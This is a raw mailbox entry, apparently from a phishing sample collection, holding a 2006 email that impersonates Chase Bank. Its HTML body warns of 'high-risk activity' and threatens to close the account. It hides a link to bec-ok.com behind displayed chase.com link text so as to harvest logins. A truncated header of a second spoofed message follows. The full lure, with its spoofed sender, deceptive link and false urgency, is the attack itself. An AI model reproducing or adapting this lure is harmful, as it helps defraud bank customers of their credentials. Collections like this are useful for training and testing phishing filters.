From: "Chase Bank" <aw-confirm@chase.com>
Reply-To: "Chase Bank" <aw-confirm@chase.com>
To: nobody@example.com, nelson@example.com, dugsong@example.com,
	dugsong@example.com
Subject: (Chase) Account 64856696 Client's Details Confirmation
Date: Sat, 08 Apr 2006 07:42:48 +0500
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--159803804500904"
X-Priority: 1
X-MSMail-Priority: High
Status: O
X-Status: 
X-Keywords:                  
X-UID: 750

----159803804500904
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www=
w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns=3D"http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1" />
<title>Untitled Document</title>
</head>

<body>
<table width=3D"673" border=3D"0">
  <tr>
    <td><div align=3D"right"><a href=3D"http://bec-ok.com:81/chase/colport=
al/prospect.php?_nfpb=3Dchange_form" target=3D"_blank"><img src=3D"http://=
www.chase.com/ccpmweb/shared/image/chaseNewlogo.gif" width=3D"138" height=3D=
"27" border=3D"0" /></a></div></td>
  </tr>
</table>
<table width=3D"673" height=3D"232" border=3D"0">
  <tr>
    <td><p>Your online credit card account has high-risk activity status. =
We are contacting you to remind that on April 10 2006 our Account Review T=
eam identified some unusual activity in your account. In accordance with C=
hase Bank User Agreement and to ensure that your account has not been comp=
romised, access your account was limited. Your account access will remain =
limited until this issue has been resolved.</p>
    <p>We encourage you to log in and perform the steps necessary to resto=
re your account access as soon as possible. Allowing your account access t=
o remain limited for an extended period of time may result in further limi=
tations on the use of your account and possible account closure.<br />
    </p>
    <p>Login to your limit account and restore online access:<br />
      <a href=3D"http://bec-ok.com:81/chase/colportal/prospect.php?_nfpb=3D=
change_form" target=3D"_blank">https://www.chase.com/asp/services/update.p=
hp?account313985</a></p>
    <p>This notification is part of the All-Electronic Program you enrolle=
d in to receive your activity report online.<br />
    </p></td>
  </tr>
</table>
<p>&nbsp;</p>
</body>
</html>


----159803804500904--

From support@chaseonline.com  Sat Apr  8 06:32:24 2006
Return-Path: <support@chaseonline.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail2.example.com (mail2.example.com [10.3.4.5])
	by naughty.example.com (Postfix) with ESMTP id 2D496536F7E
	for <nobody@login.example.com>; Sat,  8 Apr 2006 06:32:24 -0400 (EDT)
Received: from 80.77.80.47 (unknown [80.77.80.47])
	by mail2.example.com (Postfix) with SMTP id D24596FA304
	for <nobody@example.com>; Sat,  8 Apr 2006 06:32:23 -0400 (EDT)
Received: from 254.32.160.86 by ; Sat, 08 Apr 2006 06:30:06 -0500
Message-ID: <DFJLZBPGJPWXDCFGMGZUOJT@yahoo.com>
